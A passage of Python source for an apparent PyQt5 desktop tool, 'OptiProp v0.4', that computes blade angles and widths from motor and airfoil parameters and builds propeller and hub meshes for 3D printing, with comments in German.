self.spinBoxKv.setMaximum(10000)\r\n self.spinBoxKv.setSingleStep(100)\r\n self.spinBoxKv.setProperty(\"value\", 2200)\r\n self.spinBoxKv.setObjectName(\"spinBoxKv\")\r\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.spinBoxKv)\r\n \r\n self.labelU = QtWidgets.QLabel(self.widget)\r\n self.labelU.setObjectName(\"labelU\")\r\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.labelU)\r\n \r\n self.spinBoxU = QtWidgets.QDoubleSpinBox(self.widget)\r\n self.spinBoxU.setDecimals(1)\r\n self.spinBoxU.setMinimum(1.0)\r\n self.spinBoxU.setMaximum(100.0)\r\n self.spinBoxU.setSingleStep(3.7)\r\n self.spinBoxU.setProperty(\"value\", 11.1)\r\n self.spinBoxU.setObjectName(\"spinBoxU\")\r\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.spinBoxU)\r\n \r\n self.labelA = QtWidgets.QLabel(self.widget)\r\n self.labelA.setObjectName(\"labelA\")\r\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.labelA)\r\n \r\n self.spinBoxA = QtWidgets.QDoubleSpinBox(self.widget)\r\n self.spinBoxA.setDecimals(1)\r\n self.spinBoxA.setMinimum(1.0)\r\n self.spinBoxA.setMaximum(20.0)\r\n self.spinBoxA.setProperty(\"value\", 5.0)\r\n self.spinBoxA.setObjectName(\"spinBoxA\")\r\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.spinBoxA)\r\n \r\n self.widget1 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget1.setGeometry(QtCore.QRect(270, 40, 701, 400))\r\n self.widget1.setObjectName(\"widget1\")\r\n \r\n self.gridLayout = QtWidgets.QGridLayout(self.widget1)\r\n self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n \r\n self.widget2 = QtWidgets.QWidget(self.widget1)\r\n self.widget2.setObjectName(\"widget2\")\r\n \r\n self.gridLayout.addWidget(self.widget2, 0, 0, 1, 1)\r\n \r\n self.widget_2 = QtWidgets.QWidget(self.widget1)\r\n self.widget_2.setObjectName(\"widget_2\")\r\n \r\n self.bild = vpl.QtFigure(\"bild\")\r\n self.gridLayout.addWidget(self.bild, 0, 0, 1, 1)\r\n \r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1011, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n \r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n \r\n self.labelX = QtWidgets.QLabel(MainWindow)\r\n self.labelX.setGeometry(QtCore.QRect(520, 442, 300, 16))\r\n self.labelX.setObjectName(\"labelX\")\r\n \r\n self.labelPath = QtWidgets.QLabel(MainWindow)\r\n self.labelPath.setGeometry(QtCore.QRect(200, 442, 300, 16))\r\n self.labelPath.setObjectName(\"labelPath\")\r\n self.labelPath.setStyleSheet(\"background-color: white; border: 1px inset grey;\")\r\n \r\n self.table = QtWidgets.QTableWidget(MainWindow)\r\n self.table.setGeometry(QtCore.QRect(20, 240, 246, 192))\r\n \r\n self.checkBox = QtWidgets.QCheckBox(self.centralwidget)\r\n self.checkBox.setGeometry(QtCore.QRect(30, 440, 141, 17))\r\n self.checkBox.setObjectName(\"checkBox\")\r\n self.checkBox.stateChanged.connect(self.AdvancedOptions)\r\n \r\n self.label_Warning = QtWidgets.QLabel(self.centralwidget)\r\n self.label_Warning.setObjectName(\"lable_Warning\")\r\n self.label_Warning.setGeometry(30, 465, 200, 20)\r\n \r\n self.widget1 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget1.setGeometry(QtCore.QRect(30, 480, 486, 138))\r\n self.widget1.setObjectName(\"widget1\")\r\n \r\n self.gridLayout1 = QtWidgets.QGridLayout(self.widget1)\r\n self.gridLayout1.setContentsMargins(0, 0, 0, 0)\r\n self.gridLayout1.setObjectName(\"gridLayout1\")\r\n \r\n self.label_k = QtWidgets.QLabel(self.widget1)\r\n self.label_k.setObjectName(\"label_k\")\r\n self.gridLayout1.addWidget(self.label_k, 3, 0, 1, 1)\r\n \r\n self.labelPropkonst = QtWidgets.QLabel(self.widget1)\r\n self.labelPropkonst.setObjectName(\"labelPropkonst\")\r\n self.gridLayout1.addWidget(self.labelPropkonst, 0, 0, 1, 2)\r\n \r\n self.label_n = QtWidgets.QLabel(self.widget)\r\n self.label_n.setObjectName(\"label_n\")\r\n self.gridLayout1.addWidget(self.label_n, 4, 0, 1, 1)\r\n \r\n self.lineEdit_8 = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_8.setStatusTip(\"\")\r\n self.lineEdit_8.setObjectName(\"lineEdit_8\")\r\n self.gridLayout1.addWidget(self.lineEdit_8, 3, 3, 1, 1)\r\n \r\n self.lineEdit_XXXXX = QtWidgets.QLabel(self.widget1)\r\n self.lineEdit_XXXXX.setStatusTip(\"\")\r\n self.lineEdit_XXXXX.setObjectName(\"lineEdit_XXXXX\")\r\n self.gridLayout1.addWidget(self.lineEdit_XXXXX, 4, 3, 1, 1)\r\n \r\n self.label_d = QtWidgets.QLabel(self.widget1)\r\n self.label_d.setObjectName(\"label_d\")\r\n self.gridLayout1.addWidget(self.label_d, 2, 0, 1, 1)\r\n \r\n self.lineEdit_6 = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_6.setStatusTip(\"\")\r\n self.lineEdit_6.setObjectName(\"lineEdit_6\")\r\n self.gridLayout1.addWidget(self.lineEdit_6, 2, 3, 1, 1)\r\n \r\n self.label_XXXXX = QtWidgets.QLabel(self.widget1)\r\n self.label_XXXXX.setObjectName(\"label_XXXXX\")\r\n self.gridLayout1.addWidget(self.label_XXXXX, 4, 2, 1, 1)\r\n \r\n self.label_RingAu = QtWidgets.QLabel(self.widget1)\r\n self.label_RingAu.setObjectName(\"label_RingAu\")\r\n self.gridLayout1.addWidget(self.label_RingAu, 2, 2, 1, 1)\r\n \r\n self.lineEdit = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit.setStatusTip(\"\")\r\n self.lineEdit.setObjectName(\"lineEdit\")\r\n self.gridLayout1.addWidget(self.lineEdit, 1, 1, 1, 1)\r\n \r\n self.label_RingAb = QtWidgets.QLabel(self.widget1)\r\n self.label_RingAb.setObjectName(\"label_RingAb\")\r\n self.gridLayout1.addWidget(self.label_RingAb, 3, 2, 1, 1)\r\n \r\n self.lineEdit_In = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_In.setStatusTip(\"\")\r\n self.lineEdit_In.setObjectName(\"lineEdit_In\")\r\n self.gridLayout1.addWidget(self.lineEdit_In, 1, 3, 1, 1)\r\n \r\n self.label_c = QtWidgets.QLabel(self.widget1)\r\n self.label_c.setObjectName(\"label_c\")\r\n self.gridLayout1.addWidget(self.label_c, 1, 0, 1, 1)\r\n \r\n self.lineEdit_d = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_d.setStatusTip(\"\")\r\n self.lineEdit_d.setObjectName(\"lineEdit_d\")\r\n self.gridLayout1.addWidget(self.lineEdit_d, 2, 1, 1, 1)\r\n \r\n self.lineEdit_k = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_k.setStatusTip(\"\")\r\n self.lineEdit_k.setObjectName(\"lineEdit_k\")\r\n self.gridLayout1.addWidget(self.lineEdit_k, 3, 1, 1, 1)\r\n \r\n self.lineEdit_n = QtWidgets.QLineEdit(self.widget1)\r\n self.lineEdit_n.setStatusTip(\"\")\r\n self.lineEdit_n.setObjectName(\"lineEdit_n\")\r\n self.gridLayout1.addWidget(self.lineEdit_n, 4, 1, 1, 1)\r\n \r\n self.label_RingIn = QtWidgets.QLabel(self.widget1)\r\n self.label_RingIn.setObjectName(\"label_RingIn\")\r\n self.gridLayout1.addWidget(self.label_RingIn, 1, 2, 1, 1)\r\n \r\n self.labelHUb = QtWidgets.QLabel(self.widget1)\r\n self.labelHUb.setObjectName(\"labelHUb\")\r\n self.gridLayout1.addWidget(self.labelHUb, 0, 2, 1, 3)\r\n \r\n \r\n \r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n self.pushButtonGenerate.clicked.connect(self.Code)\r\n self.pushButtonExport.clicked.connect(self.Export)\r\n self.pushButtonDialog.clicked.connect(self.Dialog)\r\n \r\n self.Code()\r\n self.path = expanduser(\"~\")+'\\Documents'\r\n \r\n \r\n \r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"OptiProp v0.4\"))\r\n self.pushButtonGenerate.setText(_translate(\"MainWindow\", \"Generate\"))\r\n self.pushButtonDialog.setText(_translate(\"MainWindow\", \"...\"))\r\n self.pushButtonExport.setText(_translate(\"MainWindow\", \"Export\"))\r\n self.labelPropellerVariablen.setText(_translate(\"MainWindow\", \"Propeller variables:\"))\r\n self.labelL.setText(_translate(\"MainWindow\", \"Propeller length in mm:\"))\r\n self.labelLg.setText(_translate(\"MainWindow\", \"Draft velocity in m/s:\"))\r\n self.labelKv.setText(_translate(\"MainWindow\", \"Motor Kv:\"))\r\n self.labelU.setText(_translate(\"MainWindow\", \"Battery voltage in V:\"))\r\n self.labelA.setText(_translate(\"MainWindow\", \"Axis diameter in mm:\"))\r\n self.labelPath.setText(_translate(\"MainWindow\", \"Export path: \"+expanduser(\"~\")+'\\Documents'))\r\n self.spinBoxLg.setToolTip(\"This is the air speed that hits the propeller in the Flight direction. It consists of the flight speed and the pulled air from the propullsion \")\r\n self.spinBoxL.setToolTip(\"Length of one propeller blade, whole propeller is double the size.\")\r\n self.spinBoxKv.setToolTip(\"The motor kv rating, for rpm calculations\")\r\n self.spinBoxU.setToolTip(\"The battery voltage. In 3.7V increments\")\r\n self.spinBoxA.setToolTip(\"Diameter of the Hole for the motor shaft. The hole is 0.8 mm larger for 3D print tolerance\")\r\n self.label_Warning.setText(_translate(\"Mainwindow\",\"Warning! Only for experienced users\"))\r\n self.checkBox.setText(_translate(\"MainWindow\", \"Advanced options\"))\r\n self.label_k.setText(_translate(\"MainWindow\", \"k =\"))\r\n self.labelPropkonst.setText(_translate(\"MainWindow\", \"Propeller settings:\"))\r\n self.label_n.setText(_translate(\"MainWindow\", \"n = \"))\r\n self.lineEdit_8.setText(_translate(\"MainWindow\", \"0.8\"))\r\n \r\n self.lineEdit_XXXXX.setText(_translate(\"MainWindow\", \"\"))\r\n self.label_d.setText(_translate(\"MainWindow\", \"d =\"))\r\n self.lineEdit_6.setText(_translate(\"MainWindow\", \"2.5\"))\r\n self.label_XXXXX.setText(_translate(\"MainWindow\", \"\"))\r\n self.lineEdit_6.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.lineEdit_In.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.lineEdit_8.setToolTip(_translate(\"MainWindow\", \"in mm\"))\r\n self.label_RingAu.setText(_translate(\"MainWindow\", \"Hub outer ring thicknes:\"))\r\n self.lineEdit.setToolTip(_translate(\"MainWindow\", \"Maximum width of the propellers. In proportion to Length. Number is divided by one (if c = k then the propeller is straight)\"))\r\n self.lineEdit.setText(_translate(\"MainWindow\", \"6\"))\r\n self.label_RingAb.setText(_translate(\"MainWindow\", \"Ring spacing:\"))\r\n self.lineEdit_In.setText(_translate(\"MainWindow\", \"1.6\"))\r\n self.label_c.setText(_translate(\"MainWindow\", \"c = \"))\r\n self.lineEdit_d.setToolTip(_translate(\"MainWindow\", \"Distance to widest point. In proportion to Length. Number is divided by one \"))\r\n self.lineEdit_d.setText(_translate(\"MainWindow\", \"3\"))\r\n self.lineEdit_k.setToolTip(_translate(\"MainWindow\", \"Minimum width of the propeller. In proportion to Length. Number is divided by one (if c = k then the propeller is straight)\"))\r\n self.lineEdit_k.setText(_translate(\"MainWindow\", \"20\"))\r\n self.lineEdit_n.setToolTip(_translate(\"MainWindow\", \"Number of profiles. Higher Number means more precise 3D model\"))\r\n self.lineEdit_n.setText(_translate(\"MainWindow\", \"20\"))\r\n self.label_RingIn.setText(_translate(\"MainWindow\", \"Hub inner ring thicknes:\"))\r\n self.labelHUb.setText(_translate(\"MainWindow\", \"Propeller hub settings:\"))\r\n \r\n \r\n def AdvancedOptions(self):\r\n \r\n if self.checkBox.isChecked() == True:\r\n MainWindow.setFixedSize(1011, 640)\r\n if self.checkBox.isChecked() == False:\r\n MainWindow.setFixedSize(1011,480)\r\n \r\n \r\n def Dialog(self):\r\n options = QFileDialog.Options()\r\n options |= QFileDialog.DontUseNativeDialog\r\n options |= QFileDialog.DontUseCustomDirectoryIcons\r\n dialog = QFileDialog()\r\n dialog.setOptions(options)\r\n \r\n dialog.setFilter(dialog.filter() | QtCore.QDir.Hidden)\r\n \r\n # ARE WE TALKING ABOUT FILES OR FOLDERS\r\n \r\n dialog.setFileMode(QFileDialog.DirectoryOnly)\r\n \r\n # OPENING OR SAVING\r\n dialog.setAcceptMode(QFileDialog.AcceptOpen) #if forOpen else dialog.setAcceptMode(QFileDialog.AcceptSave)\r\n \r\n \r\n \r\n \r\n \r\n dialog.setDirectory(expanduser(\"~\")+'\\Documents')\r\n \r\n \r\n \r\n if dialog.exec_() == QDialog.Accepted:\r\n self.path = dialog.selectedFiles()[0] # returns a list\r\n self.labelPath.setText(\"Export path: \"+self.path)\r\n return self.path\r\n else:\r\n return expanduser(\"~\")+'\\Documents' \r\n \r\n \r\n \r\n \r\n \r\n def Code(self):\r\n \r\n # -*- coding: utf-8 -*-\r\n \"\"\"\r\n Created on Mon Mar 30 12:47:12 2020\r\n \r\n @author: Kai Jungsthöfel & Lars Schröder\r\n \"\"\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Variablen:\r\n \r\n L = float(self.spinBoxL.value()) # in mm #Propeller Länge\r\n self.L = L\r\n LGeschwindigkeit = float(self.spinBoxLg.value()) # in m/s #Luftzug Geschwindikeit\r\n self.LGeschwindigkeit = LGeschwindigkeit\r\n Kv = float(self.spinBoxKv.value()) # Kv #Kv rating Motor\r\n self.Kv = Kv\r\n V = float(self.spinBoxU.value()) # Volt #Batterie\r\n self.V = V\r\n Achse = float(self.spinBoxA.value()) +0.8 #in mm #Achsen größe + Sicherheitsabstand # Standard = 5\r\n self.Achse = Achse\r\n \r\n \r\n \r\n # Konstanten\r\n c = 1/float(self.lineEdit.text()) # Maximalbreite des Propellers\r\n d = 1 / float(self.lineEdit_d.text()) # Entfernung des breitesten Punkt\r\n k = 1 / float(self.lineEdit_k.text()) # Minimalbreite des Propellers\r\n n = int(self.lineEdit_n.text()) # Anzahl der Profilflächen\r\n x = L / n # Profil Abstand\r\n Alpha = 7 # Optimalwinkel\r\n #Hub Konstanten\r\n InnerRingBreite = float(self.lineEdit_In.text())\r\n RingbreiteAussen = float(self.lineEdit_6.text())\r\n Ringabstand = float(self.lineEdit_8.text())\r\n \r\n \r\n Gamma = []\r\n v = []\r\n B = []\r\n \r\n \r\n rps = Kv * V\r\n \r\n # Profilgeschwindikeits Liste\r\n for i in range(n+1):\r\n v[i] = v.append(0)\r\n Gamma[i] = Gamma.append(0)\r\n B[i] = B.append(0)\r\n \r\n for i in range(1, n+1):\r\n # Profilgeschwindikeit Rechnung\r\n v[i] = 2 * math.pi * (rps / 60) * ((x / 1000) * i)\r\n \r\n # Winkel\r\n Gamma[i] = -math.radians(math.degrees(math.atan(LGeschwindigkeit / v[i])) + Alpha)\r\n \r\n # Profilbreite\r\n B[i] = ((k * L - c * L) / (L - d * L) ** 2 * (x * (i + 1) - d * L) ** 2 + c * L)\r\n \r\n \r\n \r\n p = 0\r\n clear = 1 #Abstand vom hub bis zum anfang des Propellers in Profilflächen n\r\n for i in range(n):\r\n if (x*i) >= (Achse/2 + RingbreiteAussen +InnerRingBreite +2):\r\n if p == 0:\r\n p = 1\r\n clear = i \r\n \r\n #////// UI \\\\\\\\\\\\\\\r\n UI = []\r\n for i in range(clear, n+1):\r\n UI.append([int(v[i]),round(math.degrees(Gamma[i])*(-1),2)])\r\n \r\n self.UI = UI\r\n self.labelX.setText(\"\")\r\n \r\n \r\n \r\n \r\n # Standard Airfoil\r\n X = [\r\n 0, 0.0005, 0.001, 0.002, 0.004, 0.008, 0.012, 0.02, 0.03, 0.04, 0.05, 0.06, 0.08, 0.1, 0.12, 0.14, 0.16,\r\n 0.18, 0.2, 0.22, 0.24, 0.26, 0.28, 0.3, 0.32, 0.34, 0.36, 0.38, 0.40, 0.42, 0.44, 0.46, 0.48, 0.5, 0.52,\r\n 0.54, 0.56, 0.58, 0.6, 0.62, 0.64, 0.66, 0.68, 0.7, 0.72, 0.74, 0.76, 0.78, 0.8, 0.82, 0.84, 0.86, 0.88,\r\n 0.9, 0.92, 0.94, 0.96, 0.97, 0.98, 0.99, 1\r\n ]\r\n \r\n YO = [\r\n 0, 0.0023390, 0.0037271, 0.0058025, 0.0089238, 0.0137350, 0.0178581, 0.0253735, 0.0330215, 0.0391283,\r\n 0.0442753, 0.0487571, 0.0564308, 0.0629981, 0.0686204, 0.0734360, 0.0775707, 0.0810687, 0.0839202,\r\n 0.0861433, 0.0878308, 0.0890840, 0.0900016, 0.0906804, 0.0911857, 0.0915079, 0.0916266, 0.0915212,\r\n 0.0911712, 0.0905657, 0.0897175, 0.0886427, 0.0873572, 0.0858772, 0.0842145, 0.0823712, 0.0803480,\r\n 0.0781451, 0.0757633, 0.0732055, 0.0704822, 0.0676046, 0.0645843, 0.0614329, 0.0581599, 0.0547675,\r\n 0.0512565, 0.0476281, 0.0438836, 0.0400245, 0.0360536, 0.0319740, 0.0277891, 0.0235025, 0.0191156,\r\n 0.0146239, 0.0100232, 0.0076868, 0.0053335, 0.0029690, 0\r\n ]\r\n \r\n YU = [\r\n 0, -.0046700, -.0059418, -.0078113, -.0105126, -.0142862, -.0169733, -.0202723, -.0226056, -.0245211,\r\n -.0260452, -.0271277, -.0284595, -.0293786, -.0299633, -.0302404, -.0302404, -.0300490, -.0296656,\r\n -.0296656, -.0285181, -.0278164, -.0270696, -.0263079, -.0255565, -.0248176, -.0240870, -.0233606,\r\n -.0226341, -.0219042, -.0211708, -.0204353, -.0196986, -.0189619, -.0182262, -.0174914, -.0167572,\r\n -.0160232, -.0152893, -.0145551, -.0138207, -.0130862, -.0123515, -.0116169, -.0108823, -.0101478,\r\n -.0094133, -.0086788, -.0079443, -.0072098, -.0064753, -.0057408, -.0050063, -.0042718, -.0035373,\r\n -.0028028, -.0020683, -.0017011, -.0013339, -.0009666, 0\r\n ]\r\n \r\n \r\n #Sekundäre Koordinatenliste\r\n XO2 = []\r\n XO3 = []\r\n for i in range(len(X)):\r\n XO2[i] = XO2.append(0)\r\n XO3[i] = XO3.append(0)\r\n \r\n XU2 = []\r\n XU3 = []\r\n for i in range(len(X)):\r\n XU2[i] = XU2.append(0)\r\n XU3[i] = XU3.append(0)\r\n \r\n \r\n YO2 = []\r\n YO3 = []\r\n for i in range(len(YO)):\r\n YO2[i] = YO2.append(0)\r\n YO3[i] = YO3.append(0)\r\n \r\n YU2 = []\r\n YU3 = []\r\n for i in range(len(YU)):\r\n YU2[i] = YU2.append(0)\r\n YU3[i] = YU3.append(0)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Die Reihenfolge der Kordinaten Wird Definiert um zwei Profile mit einander zu Verbinden\r\n Eckfolge = []\r\n f = 0\r\n for i in range(len(X)*4):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f+(len(X)*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f+(len(X)*2),1+f+(len(X)*2),1+f])\r\n f += 1\r\n \r\n Eckfolge[-1].insert(2,0)\r\n Eckfolge[-1].remove(244)\r\n \r\n \r\n \r\n \r\n \r\n Propeller = []\r\n \r\n KordC = []\r\n \r\n \r\n \r\n for p in range(1,n): #standard = (1,n)\r\n \r\n \r\n Kord = [] #Kord wird Erstellt bzw. Alle kordinaten werden bei jedem p Gelöscht.\r\n \r\n # Koordinaten Skalieren und in die Zweittabellen Übertragen\r\n for i in range(len(X)):\r\n XO2[i] = (X[i] * math.cos(Gamma[p]) - YO[i] * math.sin(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n XO3[i] = (X[i] * math.cos(Gamma[p+1]) - YO[i] * math.sin(Gamma[p+1])) * B[p+1]\r\n for i in range(len(X)):\r\n XU2[i] = (X[i] * math.cos(Gamma[p]) - YU[i] * math.sin(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n XU3[i] = (X[i] * math.cos(Gamma[p+1]) - YU[i] * math.sin(Gamma[p+1])) * B[p+1]\r\n \r\n for i in range(len(YO)):\r\n YO2[i] = (X[i] * math.sin(Gamma[p]) + YO[i] * math.cos(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n YO3[i] = (X[i] * math.sin(Gamma[p+1]) + YO[i] * math.cos(Gamma[p+1])) * B[p+1]\r\n for i in range(len(YU)):\r\n YU2[i] = (X[i] * math.sin(Gamma[p]) + YU[i] * math.cos(Gamma[p])) * B[p]\r\n if p <= n-1:\r\n YU3[i] = (X[i] * math.sin(Gamma[p+1]) + YU[i] * math.cos(Gamma[p+1])) * B[p+1]\r\n \r\n \r\n for i in range(len(X)):\r\n \r\n #Kordinaten Array für Numpy-STL für ein Profil \r\n # [[x,y,z]\r\n # [x,y,z]...]\r\n \r\n xk = XO2[i]\r\n yk = YO2[i]\r\n zk = x*(p)\r\n \r\n Kordin = [zk,xk,yk] \r\n Kord.append(Kordin)\r\n \r\n \r\n XU2.reverse() #Damit die Koordinaten im Kreis um die airfoil gehen werden die Unteren Listen Rückwärts abglesen.\r\n YU2.reverse()\r\n for i in range(len(X)):\r\n xk = XU2[i]\r\n yk = YU2[i]\r\n zk = x*(p)\r\n \r\n Kordin = [zk,xk,yk]\r\n Kord.append(Kordin)\r\n \r\n if p == clear+1: #2tes Profil Speichen zum Verpinden mit dem Hub\r\n KordC = Kord\r\n for i in range(len(X)): \r\n # Es werden zwei Profile benötigt um Dreiecke zu bilden. Das Zweite Profil muss noch erstellt werden und in die gleiche liste hinter dem Ersten Profil Geschrieben werden.\r\n xk = XO3[i]\r\n yk = YO3[i]\r\n zk = x*(p+1)\r\n \r\n Kordin = [zk,xk,yk]\r\n Kord.append(Kordin)\r\n \r\n \r\n XU3.reverse() #Damit die Koordinaten im Kreis um die airfoil gehen werden die Unteren Listen Rückwärts abglesen.\r\n YU3.reverse()\r\n for i in range(len(X)):\r\n xk = XU3[i]\r\n yk = YU3[i]\r\n zk = x*(p+1)\r\n \r\n Kord.append([zk,xk,yk])\r\n \r\n \r\n \r\n \r\n \r\n if p <= n-1 and p > clear:\r\n DoppelProfilHulle = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n DoppelProfilHulle.vectors[i][j] = np.array(Kord)[f[j],:]\r\n Propeller.append(DoppelProfilHulle.data)\r\n \r\n \r\n #//////End Schließung\\\\\\\\\\\\\\\r\n Eckfolge = []\r\n f = len(X)*2 #Halb so größe eckfolge da nur ein Profil untereinander Verbunden wird\r\n for i in range(len(X)*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(len(X)*2-1),1+f,0+f])\r\n else:\r\n Eckfolge.append([1+f,1-f+(len(X)*2-2),0-f+(len(X)*2-2)])\r\n f += 1\r\n \r\n DoppelProfilHulle = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n DoppelProfilHulle.vectors[i][j] = np.array(Kord)[f[j],:]\r\n Propeller.append(DoppelProfilHulle.data)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #////// HUB \\\\\\\\\\\\\\#\r\n \r\n #HubOffset\r\n xO = 0\r\n yO = (Achse/2)+InnerRingBreite+RingbreiteAussen\r\n zO = -3\r\n \r\n \r\n #///// Innerer Kreis \\\\\\\\\\\r\n \r\n Achse2 = 0\r\n HubTopIn = []\r\n HubBottomIn = []\r\n HubRimTop = []\r\n HubRimBottom = []\r\n for i in range(19): #Koordinaten Liste für Oberen und Unteren Halbkreis\r\n i -= 4\r\n i = i*10\r\n \r\n HubTopIn.append( [math.cos(math.radians(i))*(Achse/2)+xO, math.sin(math.radians(i))*(Achse/2)+yO, 5+zO])\r\n \r\n HubBottomIn.append( [math.cos(math.radians(i))*(Achse/2)+xO, math.sin(math.radians(i))*(Achse/2)+yO, -5+zO])\r\n \r\n Achse2 = Achse + InnerRingBreite*2 \r\n for i in range(19): # Umgedrehtehälfte der Kordinaten liste\r\n p = 140-i*10\r\n \r\n HubTopIn.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, 5+zO])\r\n \r\n HubBottomIn.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, -5+zO])\r\n if p <= 100: #Koordinaten liste für den Oberen und Unteren Rand\r\n HubRimTop.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, 5+zO]) \r\n HubRimBottom.append([math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO, -5+zO])\r\n \r\n \r\n Eckfolge = [] #Eckfolge für Oberen Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0-f+(18*2),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,1-f+(18*2),0-f+(18*2)])\r\n f += 1\r\n \r\n \r\n Hub = []\r\n \r\n # Unteren und Oberen Halbkreis Erstellen \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubTopIn)[f[j],:]\r\n \r\n Eckfolge = [] #Eckfolge für Unteren Halbkreis\r\n f = 0 \r\n for i in range(18*2):\r\n if i % 2 == 0:\r\n Eckfolge.append([0+f,1+f,0-f+(18*2)])\r\n else:\r\n Eckfolge.append([0-f+(18*2),1-f+(18*2),0+f])\r\n f += 1\r\n \r\n Hub.append(Hubmesh.data)\r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubBottomIn)[f[j],:] \r\n Hub.append(Hubmesh.data)\r\n \r\n \r\n # Koordinaten liste aus der Ober und Unterhälfte für die Hülle\r\n HubTopIn.reverse() #HubTop wird umgedreht eingesetzt\r\n \r\n HubCompleteIn = HubBottomIn+ HubTopIn\r\n \r\n \r\n \r\n #Eckfolge für die Hülle\r\n Eckfolge = []\r\n f = 0 \r\n for i in range(18*2+12):\r\n if i % 2 == 0:\r\n Eckfolge.append([2-f+(18*4),1+f,0+f])\r\n else:\r\n Eckfolge.append([0+f,3-f+(18*4),2-f+(18*4)])\r\n f += 1\r\n # Zum Schließen der Form \r\n Eckfolge.append([0,38,75])\r\n Eckfolge.append([0,37,38])\r\n \r\n # Körper wird Erstellt \r\n Hubmesh = mesh.Mesh(np.zeros(np.array(Eckfolge).shape[0], dtype=mesh.Mesh.dtype))\r\n for i, f in enumerate(Eckfolge):\r\n for j in range(3):\r\n Hubmesh.vectors[i][j] = np.array(HubCompleteIn)[f[j],:] \r\n Hub.append(Hubmesh.data) \r\n \r\n \r\n \r\n \r\n \r\n \r\n #//// Äußere Kreis \\\\\\\\\\\\\r\n HubRimTop.reverse()\r\n HubRimBottom.reverse()\r\n HubTop = []\r\n HubBottom = []\r\n for i in range(19): #Koordinaten Liste für Oberen und Unteren Halbkreis\r\n i -= 9\r\n i = i*10\r\n \r\n HubTop.append( [math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,3+zO])\r\n \r\n HubBottom.append( [math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,-3+zO])\r\n if i >= -40: #Koordinaten liste für den Oberen und Unteren Rand\r\n HubRimTop.append([math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,3+zO])\r\n HubRimBottom.append([math.cos(math.radians(i))*(Achse2/2)+xO, math.sin(math.radians(i))*(Achse2/2)+yO ,-3+zO])\r\n \r\n Kord = [] \r\n Achse2 += RingbreiteAussen*2 \r\n for i in range(19): # Umgedrehtehälfte der Kordinaten liste\r\n p = 90-i*10\r\n \r\n HubTop.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,3+zO])\r\n \r\n HubBottom.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,-3+zO])\r\n \r\n #Koordinaten zum verbinden mit dem Kreis\r\n Kord.append( [math.cos(math.radians(p))*(Achse2/2)+xO, math.sin(math.radians(p))*(Achse2/2)+yO ,3+zO])\r\n Kord.reverse()\r\n for i in range(19): \r\n p = 90-i*10\r\n Kord.append( [math.cos(math.radians(p))*(Achse2/2)+xO, 